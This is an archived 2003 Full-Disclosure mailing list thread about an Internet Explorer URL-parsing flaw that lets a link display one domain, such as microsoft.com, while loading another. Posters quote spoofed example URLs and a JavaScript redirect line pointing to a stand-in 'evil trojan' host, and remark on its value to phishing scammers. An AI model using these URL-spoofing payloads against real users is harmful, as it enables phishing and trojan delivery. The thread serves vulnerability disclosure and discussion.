lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <20031209190051.79509.qmail@web60802.mail.yahoo.com>
From: sgmasood at yahoo.com (S G Masood)
Subject: RE: FWD: Internet Explorer URL parsing vulnerability

--- Exibar <exibar@...lair.com> wrote:
> my favorite will be this one that I'm sure will
> circulate:
> 
> http://www.microsoft.com%01@....linux.org
> 
>   :-)

http://www.microsoft.com%01@....linux.org
 wont work until you 
unescape('http://www.microsoft.com%01@....linux.org');


> 
> ----- Original Message ----- 
> From: "S G Masood" <sgmasood@...oo.com>
> To: <full-disclosure@...ts.netsys.com>
> Sent: Tuesday, December 09, 2003 1:22 PM
> Subject: [Full-Disclosure] RE: FWD: Internet
> Explorer URL parsing
> vulnerability
> 
> 
> >
> > LOL. This is so simple and dangerous, it almost
> made
> > me laugh and cry at the same time. Most of you
> will
> > realise why...;D
> > The Paypal, AOL, Visa, Mastercard, et al email
> > scammers will have a harvest of gold this month
> with
> > lots of zombies falling for this simple technique.
> >
> > ># POC ##########
> >
> >http://www.zapthedingbat.com/security/ex01/vun1.htm
> >
> > Dont be surprised if your latest download from
> > http://www.microsoft.com turns out to be a trojan!
> >
> >
>
location.href=unescape('http://windowsupdate.microsoft.com%01@...edownloadan
> eviltrojanfromme.com);
> >
> >
> > --
> > S.G.Masood
> >
> > Hyderabad,
> > India
> >
> > PS: One more thing - no scripting required to
> exploit this.
> >
> > __________________________________
> > Do you Yahoo!?
> > Free Pop-Up Blocker - Get it now
> > http://companion.yahoo.com/
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.netsys.com/full-disclosure-charter.html
> >
> >
> 


__________________________________
Do you Yahoo!?
Free Pop-Up Blocker - Get it now
http://companion.yahoo.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ